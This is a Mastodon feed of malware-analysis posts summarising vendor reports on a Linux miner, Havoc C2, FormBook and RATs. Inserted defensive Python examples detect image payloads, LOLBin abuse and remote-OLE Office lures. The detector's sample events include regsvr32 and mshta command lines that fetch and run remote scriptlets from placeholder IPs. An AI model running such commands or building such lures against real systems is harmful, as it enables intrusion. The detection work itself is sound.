photog.social is one of the many independent Mastodon servers you can use to participate in the fediverse.
A place for your photos and banter. "Photog first" is our motto. Please refer to the site rules before posting.

#malwareanalysis

MalwareLab<p>Analysis of <a href="https://infosec.exchange/tags/Koske" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Koske</span></a> <a href="https://infosec.exchange/tags/miner" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>miner</span></a>.</p><p>It is an AI-generated <a href="https://infosec.exchange/tags/Linux" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Linux</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> which was hidden in images with pandas. It supports a wide variety of coinminers for various cryptocurrencies and for GPU and different CPU architectures. Its other component, the <a href="https://infosec.exchange/tags/rootkit" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rootkit</span></a> <a href="https://infosec.exchange/tags/hideproc" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>hideproc</span></a>, tries to hide the Koske miner from file and process listings.</p><p><a href="https://malwarelab.eu/posts/koske-panda-ai/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">malwarelab.eu/posts/koske-pand</span><span class="invisible">a-ai/</span></a></p><p>Video from <a href="https://infosec.exchange/tags/anyrun" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>anyrun</span></a> analysis:</p><p><a href="https://www.youtube.com/watch?v=1OSPp996XQ4" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">youtube.com/watch?v=1OSPp996XQ4</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/koskeminer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>koskeminer</span></a> <a href="https://infosec.exchange/tags/coinminer" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>coinminer</span></a> <a href="https://infosec.exchange/tags/blueteam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>blueteam</span></a> <a href="https://infosec.exchange/tags/cybersecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>cybersecurity</span></a> <a href="https://infosec.exchange/tags/dfir" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>dfir</span></a> <a href="https://infosec.exchange/tags/malwareanalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malwareanalysis</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a> <a href="https://infosec.exchange/tags/reverseengineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reverseengineering</span></a></p>
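Added example, not code from the post or from the MalwareLab write-up: the post does not say how the panda images carry the payload, so this only shows the generic first check an analyst runs on a suspicious image, namely whether any bytes follow the format's end-of-image marker. The JPEG walks the segment table instead of searching for the first FF D9, because an EXIF thumbnail inside APP1 carries its own EOI. The JPEG and PNG skeletons are constructed in memory and are not decodable pictures.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def jpeg_end(blob: bytes):
    """Offset just past the JPEG EOI marker, found by walking the segment table
    (an embedded EXIF thumbnail has its own SOI/EOI, so a naive search is wrong)."""
    pos = 2  # skip SOI
    while pos + 2 <= len(blob):
        if blob[pos] != 0xFF:
            return None  # malformed: expected a marker here
        marker = blob[pos + 1]
        if marker == 0xD9:  # EOI
            return pos + 2
        if marker == 0xDA:
            # SOS: entropy-coded data follows. Byte stuffing (FF 00) and restart
            # markers (FF D0-D7) guarantee FF D9 cannot occur inside it.
            eoi = blob.find(b"\xff\xd9", pos + 2)
            return None if eoi < 0 else eoi + 2
        if pos + 4 > len(blob):
            return None
        (seglen,) = struct.unpack(">H", blob[pos + 2:pos + 4])  # length includes itself
        pos += 2 + seglen
    return None


def png_end(blob: bytes):
    """Offset just past the IEND chunk (each chunk: length, type, data, crc)."""
    pos = len(PNG_SIG)
    while pos + 8 <= len(blob):
        length, ctype = struct.unpack(">I4s", blob[pos:pos + 8])
        pos += 8 + length + 4
        if ctype == b"IEND":
            return pos
    return None


def trailing_data(blob: bytes):
    """Identify the image format and return whatever follows its end marker."""
    if blob.startswith(b"\xff\xd8"):
        fmt, end = "jpeg", jpeg_end(blob)
    elif blob.startswith(PNG_SIG):
        fmt, end = "png", png_end(blob)
    else:
        return None  # not a format this check understands
    if end is None:
        return {"format": fmt, "image_end": None, "trailing": b"", "note": "truncated or malformed"}
    return {"format": fmt, "image_end": end, "trailing": blob[end:]}


def build_jpeg(payload: bytes = b"") -> bytes:
    """Constructed, structurally valid JPEG skeleton (SOI, APP0, SOS, scan, EOI)."""
    app0 = b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    sos = b"\xff\xda" + struct.pack(">H", 8) + b"\x01\x01\x00\x00\x3f\x00"
    scan = b"\x12\xff\x00\x34\xff\xd0\x56"  # stuffed FF and a restart marker, no EOI
    return b"\xff\xd8" + app0 + sos + scan + b"\xff\xd9" + payload


def build_png(payload: bytes = b"") -> bytes:
    """Constructed 1x1 PNG skeleton with IHDR and IEND only."""
    def chunk(ctype: bytes, data: bytes) -> bytes:
        crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
        return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)
    ihdr = chunk(b"IHDR", struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0))
    return PNG_SIG + ihdr + chunk(b"IEND", b"") + payload


if __name__ == "__main__":
    # Constructed sample payload; a real polyglot would carry the dropper script here.
    for blob in (build_jpeg(b"#!/bin/bash\necho hidden payload\n"), build_png()):
        print(trailing_data(blob))
```

A non-empty `trailing` field is only a lead: legitimate files sometimes carry harmless junk after the end marker, so the next step is to look at what the trailing bytes are (shebang, ELF header, base64) rather than to alert on their presence alone.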
k3ym𖺀<p><strong>Sliver too mainstream? Cobalt Strike too patched? Say hello to Havoc.</strong></p><p><span class="h-card" translate="no"><a href="https://infosec.exchange/@FortiGuardLabs" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>FortiGuardLabs</span></a></span> just broke down a malicious Havoc C2 sample — and it’s bringing that open-source, post-exploitation energy with extra attitude.</p><p>Built for red teamers but abused by threat actors, this sample goes full dark mode:</p><ul><li>Shellcode loader in C++</li><li>AES-encrypted payload</li><li>XOR junk code to slow reverse engineering</li><li>Dynamic API resolving</li><li>LOLBin delivery via regsvr32</li></ul><p>It’s like someone asked: <em>“What if malware devs went full GitHub?”</em> (never go full GitHub)</p><p>🔗 Full breakdown:<br><a href="https://www.fortinet.com/blog/threat-research/dissecting-a-malicious-havoc-sample" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">fortinet.com/blog/threat-resea</span><span class="invisible">rch/dissecting-a-malicious-havoc-sample</span></a></p><p>TL;DR for blue teamers:</p><ul><li>Havoc ≠ harmless just because it’s open source</li><li>Monitor regsvr32, rundll32, mshta — Havoc loves its LOLBins</li><li>Watch for process injection + thread creation anomalies</li><li>Memory analysis &gt; file-based detection here</li><li>Don’t assume your EDR is catching every beacon on port 443</li></ul><blockquote><p>Is it threat emulation or a real attack?</p></blockquote><p>— Blue teamer having a full-blown identity crisis at 2am</p><p>Shoutout to <span class="h-card" translate="no"><a href="https://mastodon.social/@xpzhang" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>xpzhang</span></a></span> and team for their amazing work!</p><p><a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" 
target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/HavocC2" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HavocC2</span></a> <a href="https://infosec.exchange/tags/RedTeamTools" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>RedTeamTools</span></a> <a href="https://infosec.exchange/tags/PostExploitation" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PostExploitation</span></a> <a href="https://infosec.exchange/tags/Infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Infosec</span></a> <a href="https://infosec.exchange/tags/BlueTeam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BlueTeam</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a></p>
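Added example, not code from the post or from FortiGuard Labs: a minimal detection pass for the LOLBin-delivery pattern the TL;DR flags (regsvr32, rundll32, mshta launched with remote or scriptlet arguments, or straight from an Office parent). The event lines are constructed; the `Image | CommandLine | ParentImage` layout is an assumption standing in for whatever your EDR or Sysmon pipeline emits, and the suspicious-argument list is a starting point, not a complete rule set.

```python
import re
from dataclasses import dataclass

# LOLBins the post calls out; the Havoc sample was delivered via regsvr32.
LOLBINS = {"regsvr32.exe", "rundll32.exe", "mshta.exe"}

# A LOLBin spawned directly by a document viewer is the classic phishing chain.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# Command-line traits that are rarely legitimate for these binaries.
SUSPICIOUS_ARGS = {
    "remote url": re.compile(r"https?://", re.I),
    "scriptlet host (scrobj.dll)": re.compile(r"scrobj\.dll", re.I),
    "script protocol handler": re.compile(r"\b(javascript|vbscript):", re.I),
    "user-writable path": re.compile(
        r"\\(Users\\[^\\]+\\(AppData|Downloads)|Windows\\Temp|ProgramData)\\", re.I),
}


@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str


def parse_event(line: str) -> ProcEvent:
    """Parse the constructed 'Key=Value | Key=Value' line format used below (assumed layout)."""
    fields = dict(part.split("=", 1) for part in line.split(" | "))
    return ProcEvent(fields["Image"], fields["CommandLine"], fields["ParentImage"])


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(ev: ProcEvent):
    """Return the reasons this event looks like LOLBin abuse (empty list = nothing to flag)."""
    if basename(ev.image) not in LOLBINS:
        return []
    reasons = [name for name, pat in SUSPICIOUS_ARGS.items() if pat.search(ev.command_line)]
    parent = basename(ev.parent_image)
    if parent in OFFICE_PARENTS:
        reasons.append(f"spawned by Office process {parent}")
    return reasons


def detect(lines):
    """Run the scoring over a batch of events; returns (image name, reasons) per hit."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            hits.append((basename(ev.image), reasons))
    return hits


# Constructed process-creation events (Sysmon-style fields), not from a real host.
SAMPLE_EVENTS = [
    r"Image=C:\Windows\System32\regsvr32.exe | CommandLine=regsvr32.exe /s /u /i:http://198.51.100.7/upd.sct scrobj.dll | ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
    r"Image=C:\Windows\System32\regsvr32.exe | CommandLine=regsvr32.exe /s C:\Windows\System32\msxml3.dll | ParentImage=C:\Windows\System32\msiexec.exe",
    r"Image=C:\Windows\System32\mshta.exe | CommandLine=mshta.exe javascript:a=GetObject('script:http://198.51.100.7/p.sct').Exec();close(); | ParentImage=C:\Users\alice\AppData\Local\Temp\setup.exe",
    r"Image=C:\Windows\System32\rundll32.exe | CommandLine=rundll32.exe C:\ProgramData\cache\tmp.dll,Start | ParentImage=C:\Windows\explorer.exe",
    r"Image=C:\Windows\System32\rundll32.exe | CommandLine=rundll32.exe shell32.dll,Control_RunDLL | ParentImage=C:\Windows\explorer.exe",
]

if __name__ == "__main__":
    for image, reasons in detect(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

The two benign events (an installer registering a system DLL, Explorer opening a control panel applet) score zero, which is the point: alerting on the binary name alone buries the analyst, while arguments and parent lineage separate the loader from routine use.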
k3ym𖺀<p><strong>No PE header? No problem.</strong></p><p><span class="h-card" translate="no"><a href="https://infosec.exchange/@FortiGuardLabs" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>FortiGuardLabs</span></a></span> dropped a deep dive into a malware sample dumped without a PE header — like a cybercriminal rage-quit halfway through packing their payload.</p><p>You ever load a binary in IDA and think, “Am I being punk’d?”<br>Yeah, it’s one of those samples.</p><p>This sample:</p><ul><li><p>Reconstructs its own PE structure at runtime</p></li><li><p>Hides config data in obfuscated blobs</p></li><li><p>Uses anti-sandbox tricks to avoid analysis</p></li><li><p>Drops yet another info-stealer, because originality is dead</p></li></ul><p>It’s engineered to break basic static analysis and dodge sandboxes like it’s speedrunning DEFCON CTF.</p><p>🔗 Full breakdown:<br><a href="https://www.fortinet.com/blog/threat-research/deep-dive-into-a-dumped-malware-without-a-pe-header" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">fortinet.com/blog/threat-resea</span><span class="invisible">rch/deep-dive-into-a-dumped-malware-without-a-pe-header</span></a></p><p>TL;DR for blue teamers:</p><ul><li><p>Static AV signatures won’t help here</p></li><li><p>Watch for suspicious memory allocations + hollowing patterns</p></li><li><p>Endpoint heuristics &gt; file-based detection</p></li><li><p>Log your PowerShell and LOLBins — this thing probably brings friends</p></li><li><p>If your EDR cries when it sees raw shellcode, maybe give it a hug</p></li></ul><p><a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a 
href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/Infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Infosec</span></a> <a href="https://infosec.exchange/tags/PEFilesAreSo2020" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>PEFilesAreSo2020</span></a> <a href="https://infosec.exchange/tags/EDREvasion" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>EDREvasion</span></a> <a href="https://infosec.exchange/tags/LOLbins" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>LOLbins</span></a> <a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/BlueTeam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BlueTeam</span></a></p>
k3ym𖺀<p>🚨 0-day vibes from 2017? Yup, it’s still happening.</p><p>A malicious Excel file using CVE-2017-0199 is out here in 2025 dropping FormBook like it's a fresh mixtape. </p><p>The attack chain?</p><ul><li>Macro-free Excel</li><li>Weaponized with remote .hta</li><li>Payload: Info-stealer FormBook</li></ul><p>Despite being 7+ years old, this vuln still slaps in phishing campaigns — because patching is apparently a myth.</p><p>Full technical breakdown by <span class="h-card" translate="no"><a href="https://infosec.exchange/@FortiGuardLabs" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>FortiGuardLabs</span></a></span>: <a href="https://www.fortinet.com/blog/threat-research/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="ellipsis">fortinet.com/blog/threat-resea</span><span class="invisible">rch/how-a-malicious-excel-file-cve-2017-0199-delivers-the-formbook-payload</span></a></p><p>TL;DR for blue teamers:</p><ul><li>Watch your egress traffic</li><li>Harden Office apps</li><li>Monitor LOLBins (Living Off the Land Binaries)</li><li>Block outbound to shady IPs faster than your memes go viral</li></ul><p>Don’t let your org get dunked on by a 2017 CVE in 2025. That’s not a good look. 
</p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/FormBook" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FormBook</span></a> <a href="https://infosec.exchange/tags/CVE20170199" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CVE20170199</span></a> <a href="https://infosec.exchange/tags/Infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Infosec</span></a> <a href="https://infosec.exchange/tags/BlueTeam" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>BlueTeam</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/HackerNews" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>HackerNews</span></a> <a href="https://infosec.exchange/tags/Phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Phishing</span></a></p>
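Added example, not code from the FortiGuard write-up: the document-side check for the chain above. A macro-free OOXML document can only reach a remote .hta through a relationship entry with `TargetMode="External"`, so the scanner walks every `.rels` part in the zip and reports external relationships that are OLE objects or that point at executable content. The workbook is constructed in memory; the assumption is that the lure is OOXML rather than the RTF variant, which needs a different parser.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
HYPERLINK_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"
# File types that should never be the target of a document relationship.
RISKY_TARGET = re.compile(r"\.(hta|sct|vbs|js|wsf|ps1|exe|dll)(\?|#|$)", re.I)


def scan_ooxml(data: bytes):
    """Return every external relationship that is an OLE object or points at a risky file."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue  # internal parts stay inside the archive
                target = rel.get("Target", "")
                rtype = rel.get("Type", "")
                if rtype == OLE_REL or RISKY_TARGET.search(target):
                    findings.append({"rels": name, "id": rel.get("Id"),
                                     "type": rtype.rsplit("/", 1)[-1], "target": target})
    return findings


def build_sample_xlsx(ole_target: str, external: bool = True) -> bytes:
    """Constructed minimal workbook: one sheet whose .rels carries a drawing, an ordinary
    hyperlink and an OLE object relationship; only the OLE entry is controlled by the args."""
    mode = " TargetMode='External'" if external else ""
    rels = (
        f"<Relationships xmlns='{REL_NS}'>"
        "<Relationship Id='rId1' Type='http://schemas.openxmlformats.org/officeDocument/2006/relationships/drawing'"
        " Target='../drawings/drawing1.xml'/>"
        f"<Relationship Id='rId2' Type='{OLE_REL}' Target='{ole_target}'{mode}/>"
        f"<Relationship Id='rId3' Type='{HYPERLINK_REL}' Target='https://example.com/' TargetMode='External'/>"
        "</Relationships>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml",
                   "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        z.writestr("xl/worksheets/sheet1.xml",
                   "<worksheet xmlns='http://schemas.openxmlformats.org/spreadsheetml/2006/main'/>")
        z.writestr("xl/worksheets/_rels/sheet1.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed lure: the OLE object's target is a remote HTA on a documentation-range IP.
    for finding in scan_ooxml(build_sample_xlsx("http://203.0.113.5/invoice.hta")):
        print(finding)
```

The ordinary hyperlink (rId3) is external too but is not reported, because a link the user must click is a different risk from an OLE object the application resolves on open; if your mail gateway already blocks external OLE relationships outright, this check is the quick way to confirm a sample would have been caught.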
SecuritySnacks<p>Cybercrime group FIN6 (aka Skeleton Spider) is leveraging trusted cloud services like AWS to deliver malware through fake job applications.</p><p>Our latest analysis breaks down: <br>🔹 How attackers use LinkedIn &amp; Indeed to build trust<br>🔹 The use of resume-themed phishing lures<br>🔹 Cloud-hosted infrastructure that evades detection<br>🔹 The delivery of the More_eggs backdoor via .LNK files<br>🔹 Key defense strategies for recruiters and security teams</p><p>This campaign is a masterclass in low-complexity, high-evasion phishing</p><p>📖 Read the full breakdown: <a href="https://dti.domaintools.com/skeleton-spider-trusted-cloud-malware-delivery/?utm_source=Mastodon&amp;utm_medium=Social&amp;utm_campaign=Skeleton-Spider" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">dti.domaintools.com/skeleton-s</span><span class="invisible">pider-trusted-cloud-malware-delivery/?utm_source=Mastodon&amp;utm_medium=Social&amp;utm_campaign=Skeleton-Spider</span></a></p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/FIN6" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>FIN6</span></a> <a href="https://infosec.exchange/tags/Phishing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Phishing</span></a> <a href="https://infosec.exchange/tags/CloudSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CloudSecurity</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/InfoSec" class="mention 
hashtag" rel="nofollow noopener" target="_blank">#<span>InfoSec</span></a> <a href="https://infosec.exchange/tags/SkeletonSpider" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>SkeletonSpider</span></a></p>
Brian Greenberg :verified:<p>🖥️ A new Windows-based Remote Access Trojan (RAT) has been exposed — and it’s unusually stealthy.</p><p>👉 It corrupts critical DOS + PE headers, making it difficult to analyze or reconstruct.<br>👉 It embeds inside dllhost.exe, communicates via encrypted C2, and runs multi-threaded client sessions.<br>👉 Researchers at Fortinet had to replicate the compromised system’s environment to finally analyze it.</p><p>🚨 This attack highlights how adversaries are evolving to evade both detection and reverse engineering.<br>⚠️ Organizations should ensure endpoint monitoring can catch process anomalies — not just file signatures.</p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> 🛡️ <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> 🔍 <a href="https://infosec.exchange/tags/WindowsSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>WindowsSecurity</span></a> 💻 <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> 🌐<br><a href="https://thehackernews.com/2025/05/new-windows-rat-evades-detection-for.html" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">thehackernews.com/2025/05/new-</span><span class="invisible">windows-rat-evades-detection-for.html</span></a></p>
SecuritySnacks<p>🔥 Hot off the presses!</p><p>DomainTools Investigations shares that a spoofed antivirus download page is delivering VenomRAT, StormKitty, and SilentTrinity—a powerful combo for credential theft, persistence, and long-term access.</p><p>🔎 We traced the infrastructure, payloads, and attacker tactics.</p><p>Full breakdown: <a href="https://dti.domaintools.com/venomrat/?utm_source=Mastodon&amp;utm_medium=Social&amp;utm_campaign=VenomRAT" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">dti.domaintools.com/venomrat/?</span><span class="invisible">utm_source=Mastodon&amp;utm_medium=Social&amp;utm_campaign=VenomRAT</span></a></p><p><a href="https://infosec.exchange/tags/CyberSecurity" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>CyberSecurity</span></a> <a href="https://infosec.exchange/tags/ThreatIntel" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ThreatIntel</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/Infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>Infosec</span></a></p>
Cindʎ Xiao 🍉<p><span class="h-card" translate="no"><a href="https://infosec.exchange/@REverseConf" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>REverseConf</span></a></span> If you ever need to find both the talk video and the slides again, they are collected in one place on my site and on GitHub, for your convenient bookmarking:</p><p><a href="https://cxiao.net/posts/2025-02-28-reconstructing-rust-types-re-verse-2025/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">cxiao.net/posts/2025-02-28-rec</span><span class="invisible">onstructing-rust-types-re-verse-2025/</span></a><br><a href="https://github.com/cxiao/reconstructing-rust-types-talk-re-verse-2025/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/cxiao/reconstructin</span><span class="invisible">g-rust-types-talk-re-verse-2025/</span></a></p><p><a href="https://infosec.exchange/tags/rust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rust</span></a> <a href="https://infosec.exchange/tags/rustlang" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rustlang</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/reversing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reversing</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
Cindʎ Xiao 🍉<p><span class="h-card" translate="no"><a href="https://infosec.exchange/@REverseConf" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>REverseConf</span></a></span> The slides for "Reconstructing Rust Types: A Practical Guide for Reverse Engineers" are also available! There is a convenient single-page HTML version if you want to use the material in the presentation as a reference, for your own reversing!</p><p><a href="https://cxiao.net/posts/2025-02-28-reconstructing-rust-types-re-verse-2025/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">cxiao.net/posts/2025-02-28-rec</span><span class="invisible">onstructing-rust-types-re-verse-2025/</span></a><br><a href="https://github.com/cxiao/reconstructing-rust-types-talk-re-verse-2025/" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://</span><span class="ellipsis">github.com/cxiao/reconstructin</span><span class="invisible">g-rust-types-talk-re-verse-2025/</span></a></p><p><a href="https://infosec.exchange/tags/rust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rust</span></a> <a href="https://infosec.exchange/tags/rustlang" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rustlang</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/reversing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reversing</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/infosec" 
class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
Cindʎ Xiao 🍉<p>Hi Rust reversing fans - the recording of my talk at <span class="h-card" translate="no"><a href="https://infosec.exchange/@REverseConf" class="u-url mention" rel="nofollow noopener" target="_blank">@<span>REverseConf</span></a></span>: Reconstructing Rust Types: A Practical Guide for Reverse Engineers, is available for you to watch!</p><p><a href="https://www.youtube.com/watch?v=SGLX7g2a-gw" rel="nofollow noopener" translate="no" target="_blank"><span class="invisible">https://www.</span><span class="">youtube.com/watch?v=SGLX7g2a-gw</span><span class="invisible"></span></a></p><p><a href="https://infosec.exchange/tags/rust" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rust</span></a> <a href="https://infosec.exchange/tags/rustlang" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>rustlang</span></a> <a href="https://infosec.exchange/tags/ReverseEngineering" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>ReverseEngineering</span></a> <a href="https://infosec.exchange/tags/reversing" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>reversing</span></a> <a href="https://infosec.exchange/tags/malware" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>malware</span></a> <a href="https://infosec.exchange/tags/MalwareAnalysis" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>MalwareAnalysis</span></a> <a href="https://infosec.exchange/tags/infosec" class="mention hashtag" rel="nofollow noopener" target="_blank">#<span>infosec</span></a></p>
